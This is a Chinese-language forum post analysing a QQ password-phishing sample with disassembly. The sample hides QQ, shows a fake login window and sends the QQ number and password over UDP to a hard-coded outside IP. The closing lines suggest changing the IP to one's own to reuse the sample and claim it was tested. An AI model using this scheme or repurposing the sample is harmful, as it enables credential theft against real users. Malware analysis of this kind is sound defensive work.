程序流程:
首先注册自己程序的窗口以及类等一系列窗口操作,安装了一个定时器,间隔为100ms,功能搜索QQ的类名,如果找到就利用FindWindow("5B3838F5-0C81-46D9-A4C0-6EA28CA3E942", NULL)找到当前运行的QQ号,之后隐藏QQ主界面,弹出自己的界面,利用socket发送输入的密码到指定的IP、端口,达到窃取用户的QQ密码。
程序很简单不过,不过代码确实有点多,不过很多都是多是对字符串的操作,动态就直接无视吧。
具体分析:
我们向下观察就可以直接来到main
main函数代码很少,就这么少。不过当然代码基本都在消息处理窗口。
首先来到004029CA这call,利用IDA强大功能,很容易的找到窗口回调函数的地址是0x4034b0
.text:00402C0E mov [ebp+var_34.cbSize], 30h
.text:00402C15 mov [ebp+var_34.style], 3
.text:00402C1C mov [ebp+var_34.lpfnWndProc], offset sub_4034B0 ; 消息回调函数
.text:00402C23 mov [ebp+var_34.cbClsExtra], 0
.text:00402C2A mov [ebp+var_34.cbWndExtra], 0
.text:00402C31 mov eax, [ebp+hInstance]
接着来到004029DA |. E8 21030000 call 同学假日.00402D00 这个call
创建程序主窗口,标题为sadd,类名为SADD,代码如下
00402D55 . 68 B0F14500 push 同学假日.0045F1B0 ; |sadd
00402D5A . 68 E8F04500 push 同学假日.0045F0E8 ; |SADD
00402D5F . 68 80000000 push 0x80 ;
00402D64 . FF15 E4E14400 call dword ptr ds:[<&USER32.CreateWindow>;
接着创建一个类名为Edit的编辑框,代码如下
00402DC7 . 51 push ecx ; |// Edit
00402DC8 . 6A 00 push 0x0 ; |ExtStyle = 0
00402DCA . FF15 E8E14400 call dword ptr ds:[<&USER32.CreateWindow>;
接着还创建一个类名为Edit的编辑框,代码如下
00402E0A . 51 push ecx ; |// Edit
00402E0B . 6A 00 push 0x0 ; |ExtStyle = 0
00402E0D . FF15 E8E14400 call dword ptr ds:[<&USER32.CreateWindow>;
接着安装了一个100ms的定时器,代码如下
004033E8 . 6A 00 push 0x0 ; /Timerproc = NULL
004033EA . 6A 64 push 0x64 ; |Timeout = 100. ms
004033EC . 6A 01 push 0x1 ; |TimerID = 1
004033EE . 8B45 F4 mov eax,dword ptr ss:[ebp-0xC] ; |
004033F1 . 50 push eax ; |hWnd
004033F2 . FF15 F8E14400 call dword ptr ds:[<&USER32.SetTimer>] ; \SetTimer
下面对一系列的字符串进行加密操作,代码如下
00402FB7 > \68 04010000 push 0x104
00402FBC . 6A 00 push 0x0
00402FBE . 68 98F64500 push 同学假日.0045F698 ; TXGuiFoundation
00402FC3 . E8 48740000 call 同学假日.0040A410
00402FC8 . 83C4 0C add esp,0xC
00402FCB . 68 04010000 push 0x104
00402FD0 . 6A 00 push 0x0
00402FD2 . 68 90F54500 push 同学假日.0045F590
00402FD7 . E8 34740000 call 同学假日.0040A410
00402FDC . 83C4 0C add esp,0xC
00402FDF . 68 04010000 push 0x104
00402FE4 . 6A 00 push 0x0
00402FE6 . 68 88F44500 push 同学假日.0045F488 ; a=x12x&b=_)&c=(*
00402FEB . E8 20740000 call 同学假日.0040A410
00402FF0 . 83C4 0C add esp,0xC
00402FF3 . 68 04010000 push 0x104
00402FF8 . 6A 00 push 0x0
00402FFA . 68 80F34500 push 同学假日.0045F380 ; 密码错误,请重新输入
00402FFF . E8 0C740000 call 同学假日.0040A410
00403004 . 83C4 0C add esp,0xC
00403007 . 68 04010000 push 0x104
0040300C . 6A 00 push 0x0
0040300E . 68 78F24500 push 同学假日.0045F278 ; 密码验证成功
00403013 . E8 F8730000 call 同学假日.0040A410
进入00403287 . E8 34DEFFFF call 同学假日.004010C0这个call
首先创建了一个wanxinyi的互斥对象,保证程序只能有一个被运行,否则ExitProcess
00401102 . 68 BCE34400 push 同学假日.0044E3BC ; /wanxinyi
00401107 . 6A 00 push 0x0 ; |InitialOwner = FALSE
00401109 . 6A 00 push 0x0 ; |pSecurity = NULL
0040110B . FF15 74E04400 call dword ptr ds:[<&KERNEL32.CreateMute>;
00401111 . 3BF4 cmp esi,esp
00401113 . E8 D88B0000 call 同学假日.00409CF0
00401118 . 8945 E8 mov dword ptr ss:[ebp-0x18],eax
0040111B . 8BF4 mov esi,esp
0040111D . FF15 D0E04400 call dword ptr ds:[<&KERNEL32.GetLastErr>;
00401123 . 3BF4 cmp esi,esp
00401125 . E8 C68B0000 call 同学假日.00409CF0
0040112A . 3D B7000000 cmp eax,0xB7
0040112F . 75 11 jnz X同学假日.00401142
00401131 . 8BF4 mov esi,esp
00401133 . 6A 00 push 0x0 ; /ExitCode = 0
接着读取sed文件的内容“amr”字符串内容
0040115F . 8BF4 mov esi,esp
00401161 . 68 04010000 push 0x104 ; /BufSize = 104 (260.)
00401166 . 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130] ; |
0040116C . 50 push eax ; |PathBuffer
0040116D . 6A 00 push 0x0 ; |hModule = NULL
0040116F . FF15 D8E04400 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401175 . 3BF4 cmp esi,esp
00401177 . E8 748B0000 call 同学假日.00409CF0
0040117C . 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
00401182 . 50 push eax
00401183 . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
00401189 . E8 F2260000 call 同学假日.00403880
0040118E . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
00401195 . A1 B8E34400 mov eax,dword ptr ds:[0x44E3B8]
0040119A . 50 push eax
0040119B . 6A 5C push 0x5C
0040119D . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
004011A3 . E8 482B0000 call 同学假日.00403CF0
004011A8 . 50 push eax
004011A9 . 6A 00 push 0x0
004011AB . 8D8D 90FDFFFF lea ecx,dword ptr ss:[ebp-0x270]
004011B1 . 51 push ecx
004011B2 . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
004011B8 . E8 832B0000 call 同学假日.00403D40
004011BD . 8985 88FDFFFF mov dword ptr ss:[ebp-0x278],eax
004011C3 . 8B95 88FDFFFF mov edx,dword ptr ss:[ebp-0x278]
004011C9 . 8995 84FDFFFF mov dword ptr ss:[ebp-0x27C],edx
004011CF . C645 FC 01 mov byte ptr ss:[ebp-0x4],0x1
004011D3 . 8B85 84FDFFFF mov eax,dword ptr ss:[ebp-0x27C]
004011D9 . 50 push eax
004011DA . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
004011E0 . E8 7B280000 call 同学假日.00403A60
004011E5 . C645 FC 00 mov byte ptr ss:[ebp-0x4],0x0
004011E9 . 8D8D 90FDFFFF lea ecx,dword ptr ss:[ebp-0x270]
004011EF . E8 DC270000 call 同学假日.004039D0
004011F4 . 68 B0E34400 push 同学假日.0044E3B0 ; \sed
004011F9 . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
004011FF . E8 FC280000 call 同学假日.00403B00
00401204 . 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-0x158]
0040120A . 50 push eax
0040120B . B9 30FA4500 mov ecx,同学假日.0045FA30
00401210 . E8 4B280000 call 同学假日.00403A60
00401215 . 8BF4 mov esi,esp
00401217 . 6A 00 push 0x0
00401219 . 68 80000000 push 0x80
0040121E . 6A 03 push 0x3
00401220 . 6A 00 push 0x0
00401222 . 6A 01 push 0x1
00401224 . 68 00000080 push 0x80000000
00401229 . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
0040122F . E8 7C290000 call 同学假日.00403BB0
00401234 . 50 push eax ; |FileName
00401235 . FF15 DCE04400 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
0040123B . 3BF4 cmp esi,esp
0040123D . E8 AE8A0000 call 同学假日.00409CF0
00401242 . 8985 9CFEFFFF mov dword ptr ss:[ebp-0x164],eax
00401248 . 83BD 9CFEFFFF>cmp dword ptr ss:[ebp-0x164],-0x1
0040124F . 75 27 jnz X同学假日.00401278
00401251 . C785 B8FDFFFF>mov dword ptr ss:[ebp-0x248],0x0
0040125B . C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
00401262 . 8D8D A8FEFFFF lea ecx,dword ptr ss:[ebp-0x158]
00401268 . E8 63270000 call 同学假日.004039D0
0040126D . 8B85 B8FDFFFF mov eax,dword ptr ss:[ebp-0x248]
00401273 . E9 A9000000 jmp 同学假日.00401321
00401278 > 8BF4 mov esi,esp
0040127A . 6A 00 push 0x0 ; /pFileSizeHigh = NULL
0040127C . 8B85 9CFEFFFF mov eax,dword ptr ss:[ebp-0x164] ; |
00401282 . 50 push eax ; |hFile
00401283 . FF15 E0E04400 call dword ptr ds:[<&KERNEL32.GetFileSiz>; \GetFileSize
00401289 . 3BF4 cmp esi,esp
0040128B . E8 608A0000 call 同学假日.00409CF0
00401290 . 8985 90FEFFFF mov dword ptr ss:[ebp-0x170],eax
00401296 . 8B85 90FEFFFF mov eax,dword ptr ss:[ebp-0x170]
0040129C . 83E8 16 sub eax,0x16
0040129F . 8985 90FEFFFF mov dword ptr ss:[ebp-0x170],eax
004012A5 . 8BF4 mov esi,esp
004012A7 . 6A 00 push 0x0 ; /Origin = FILE_BEGIN
004012A9 . 6A 00 push 0x0 ; |pOffsetHi = NULL
004012AB . 8B85 90FEFFFF mov eax,dword ptr ss:[ebp-0x170] ; |
004012B1 . 50 push eax ; |OffsetLo
004012B2 . 8B8D 9CFEFFFF mov ecx,dword ptr ss:[ebp-0x164] ; |
004012B8 . 51 push ecx ; |hFile
004012B9 . FF15 E4E04400 call dword ptr ds:[<&KERNEL32.SetFilePoi>; \SetFilePointer
004012BF . 3BF4 cmp esi,esp
004012C1 . E8 2A8A0000 call 同学假日.00409CF0
004012C6 . 8BF4 mov esi,esp
004012C8 . 6A 00 push 0x0 ; /pOverlapped = NULL
004012CA . 8D45 DC lea eax,dword ptr ss:[ebp-0x24] ; |
004012CD . 50 push eax ; |pBytesRead
004012CE . 6A 06 push 0x6 ; |BytesToRead = 6
004012D0 . 68 14FA4500 push 同学假日.0045FA14 ; |amr
004012D5 . 8B8D 9CFEFFFF mov ecx,dword ptr ss:[ebp-0x164] ; |
004012DB . 51 push ecx ; |hFile
004012DC . FF15 E8E04400 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
回到main函数就是消息循环了,此时我们来到消息处理函数4034b0处
当程序收到0x113也就是WM_TIMER消息的时候,跳到0x004036F4
0040350E |. 81BD C4FDFFFF>cmp [local.143],0x113
00403518 |. 0F84 D6010000 je 同学假日.004036F4
0040351E |. 83BD C4FDFFFF>cmp [local.143],0x2
00403525 |. 0F84 D7010000 je 同学假日.00403702
那我们就来到0x004036F4,代码如下
004036F4 |> \8B45 08 mov eax,[arg.1] ; // 消息等于0x113 WM_TIMER
004036F7 |. 50 push eax
004036F8 |. E8 D3E6FFFF call 同学假日.00401DD0
进入00401DD0这个CALL以后,再进入
00401E10 |. E8 1BFCFFFF call 同学假日.00401A30
动态获取GetForegroundWindow函数的地址
00401B7D |. 50 push eax ; /ProcNameOrOrdinal
00401B7E |. 8B4D E0 mov ecx,[local.8] ; |
00401B81 |. 51 push ecx ; |hModule
00401B82 |. FF15 24E04400 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress
并且在下面调用
00401B8F |. 8945 D4 mov [local.11],eax
00401B92 |. 837D D4 00 cmp [local.11],0x0
00401B96 |. 75 04 jnz X同学假日.00401B9C
00401B98 |. 33C0 xor eax,eax
00401B9A |. EB 0C jmp X同学假日.00401BA8
00401B9C |> 8BF4 mov esi,esp
00401B9E |. FF55 D4 call [local.11]
下面这个call类似,动态获取GetClassNameA(hwnd, LPSTR,INT)函数的地址,并且获取当前窗口的类名
00401E45 |. E8 C6FDFFFF call 同学假日.00401C10
接下来,当前窗口类名和QQ类名,进行比较
00401E4D |. 68 98F64500 push 同学假日.0045F698 ; TXGuiFoundation
00401E52 |. 8D85 DCFEFFFF lea eax,[local.73]
00401E58 |. 50 push eax
00401E59 |. E8 E2020000 call 同学假日.00402140 ; // compare
00401E5E |. 83C4 08 add esp,0x8 ; // 如果是TXGuiFoundation类名就继续向下执行,
00401E61 |. 85C0 test eax,eax ; // 否则就继续在WM_TIMER回调函数里继续寻找TXGuiFoundation
00401E63 |. 0F84 58020000 je 同学假日.004020C1,
运行到00401E63 这后,看堆栈信息
0012F830 0012F994 ASCII "TXGuiFoundation"
0012F834 0045F698 ASCII "TXGuiFoundation"
两者相等,这里说明下,只要QQ在桌面,那么它就是激活的窗口。
接着进入下面这个call
00401E74 E8 57F6FFFF call 同学假日.004014D0 ;
这个call通过下面这样的形式获取到当前运行的QQ号
HWND hwnd = FindWindow("5B3838F5-0C81-46D9-A4C0-6EA28CA3E942", NULL);
if (hwnd != NULL)
{
//DWORD calcID;
char szText[MAX_PATH] = {0};
//QQ号,存在szText
GetWindowText(hwnd, szText, MAX_PATH);
printf("%s", szText);
getchar();
}
//输出qqexchangewnd_shortcut_prefix_769628867
Ctrl+F9走出这个call,后,就是对字符qqexchangewnd_shortcut_prefix_769628867进行截取的操作,获取到QQ好,然后填入到编辑框中。
到此,WM_TIMER消息就分析完了
接着分析0x202,WM_LBUTTONUP消息
重载样本,利用OD搜索字符串,双击“a=x12x&b=_)&c=(*”字符串,找到断首,下断
然后F9运行起来,此时弹出界面(运行的是最后QQ没有被隐藏,如果隐藏了,右键任务栏QQ图标,等几s就能弹出界面),输入密码123456,点击登录,程序就断了下来
进入下面004025D9 的call,发现是对socket处理,进行发包操作,
004025C3 |. 89A5 7CFEFFFF mov [local.97],esp
004025C9 |. 68 10E44400 push 同学假日.0044E410 ; 192.74.230.75
004025CE |. E8 AD120000 call 同学假日.00403880
004025D3 |. 8985 ACFDFFFF mov [local.149],eax
004025D9 |. E8 52FCFFFF call 同学假日.00402230 ; // 密码错误
F9运行会显示“密码错误,请重新输入”下面的界面
重新输入程序又断了下来,此时依然进入进入下面004025D9 的call,就没提示错误了,发包也成功了。作者显示一个错误的目的就是收到两次用户名、密码,仅此而已。
发送的数据格式为a=769628867&b=123456&c=amr,a= QQ号&b=密码&c=amr,amr是从本样本的sed文件读取。运行完刚那个call,来到00402841,向下单步
显示“密码验证成功”,并且隐藏样本界面,很简单,只是代码有点多。
00402841 |. E8 EAFBFFFF call 同学假日.00402430
00402846 |. 83C4 08 add esp,0x8
00402849 |. 8BF4 mov esi,esp
0040284B |. 68 C5E34400 push 同学假日.0044E3C5 ; /Text = ""
00402850 |. 8B45 E8 mov eax,[local.6] ; |
00402853 |. 50 push eax ; |hWnd
00402854 |. FF15 24E24400 call dword ptr ds:[<&USER32.SetWindowTex>; \SetWindowTextA
0040285A |. 3BF4 cmp esi,esp
0040285C |. E8 8F740000 call 同学假日.00409CF0
00402861 |. 8BF4 mov esi,esp
00402863 |. 6A 00 push 0x0 ; /ShowState = SW_HIDE
00402865 |. 8B45 08 mov eax,[arg.1] ; |
00402868 |. 50 push eax ; |hWnd
00402869 |. FF15 B0E14400 call dword ptr ds:[<&USER32.ShowWindow>] ; \ShowWindow
这个钓鱼样本,如果把发包的IP改成自己的IP,自己写个服务端,就可以自己用了。
很简单,测试也成功了。UDP格式的。
代码如下:
[峰会]看雪.第八届安全开发者峰会10月23日上海龙之梦大酒店举办!
尊师的文章条理清晰
